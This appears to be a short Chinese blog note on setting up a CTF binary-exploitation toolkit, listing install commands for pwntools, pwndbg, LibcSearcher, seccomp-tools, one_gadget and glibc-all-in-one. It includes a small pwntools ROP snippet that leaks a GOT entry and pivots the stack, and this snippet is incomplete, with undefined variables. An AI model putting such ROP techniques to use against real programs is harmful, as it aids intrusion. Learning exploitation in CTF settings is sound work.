pwn环境搭建
新弄了台机子,重新搭下环境,整理一下各种工具。
pwntools
sudo apt-get update
sudo apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
sudo python3 -m pip install --upgrade pip
sudo python3 -m pip install --upgrade pwntools学习了下ROP类的用法
elf = ELF('./pwn')
payload = ROP(elf)
payload.puts(elf.got['puts'])
payload.raw(ret)
payload.elfs.append()
payload = ROP(elf)
payload.raw(b'A'* 0x30 + p64(stack -8)+p64(payload.leave[0]))pwndbg
sudo apt-get install gdb
git clone https://github.com/pwndbg/pwndbg
cd pwndbg
./setup.sh安装完成后可能会报错
利用 code /mnt/c/Study_Code/pwndbg/pwndbg/memoize.py
修改
collections.Hashable --> collections.abc.Hashable
即可
LibcSearcher
pip3 install LibcSearcherseccomp-tools
sudo apt install gcc ruby-dev
sudo gem install seccomp-toolsone_gadget
sudo gem install one_gadgetUsage: one_gadget <FILE|-b BuildID> [options]
-b, --build-id BuildID BuildID[sha1] of libc.
-f, --[no-]force-file Force search gadgets in file instead of build id first.
-l, --level OUTPUT_LEVEL The output level.
OneGadget automatically selects gadgets with higher successful probability.
Increase this level to ask OneGadget show more gadgets it found.
Default: 0
-n, --near FUNCTIONS/FILE Order gadgets by their distance to the given functions or to the GOT functions of the given file.
-r, --[no-]raw Output gadgets offset only, split with one space.
-s, --script exploit-script Run exploit script with all possible gadgets.
The script will be run as 'exploit-script $offset'.
--info BuildID Show version information given BuildID.
--base BASE_ADDRESS The base address of libc.
Default: 0
--version Current gem version.glibc-all-in-one
git clone https://github.com/matrix1001/glibc-all-in-one.git